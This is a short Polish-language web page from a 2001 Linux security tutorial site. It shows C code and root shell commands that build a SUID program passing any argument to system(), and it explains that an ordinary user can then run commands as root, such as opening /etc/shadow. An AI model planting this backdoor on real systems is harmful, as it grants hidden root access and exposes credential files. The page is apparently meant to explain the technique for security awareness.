Bezpieczeństwo systemów Linux'owych

Linux Security - Suidy
Strona główna

Dodatkowy program typu suid
[1] [2] [3] [4] [5]
Można utworzyć własny program z atrybutem SUID który będzie wywoływał shella. 
[root@localhost]# cat shell.c

#include 
int main(int param,char *argv[])
{
	printf("Exec program:\n");
	system(argv[1]);
	return 0;
}
[root@localhost]# gcc -o shell shell.c
[root@localhost]# chown root shell
[root@localhost]# chmod +s shell
Teraz wystarczy tylko uruchomić program "shell" z dowolnym parametrem jako zwykły użytkownik aby uzyskać uprawnienia administratora.
(Np. ./shell vi /etc/shadow).

ICMP - Pine - Fork - Firewall - Bezpieczne partycje
Suidy - Skanowanie - Word exportable - Backdoor'y - Sumy kontrolne
Perl - Logrotate - Shell przez WWW - Forum - Księga gości - Statystka - Linki

Kontakt: tronix@2com.pl
Copyright by Tronix (c)2001 All Rights Reserved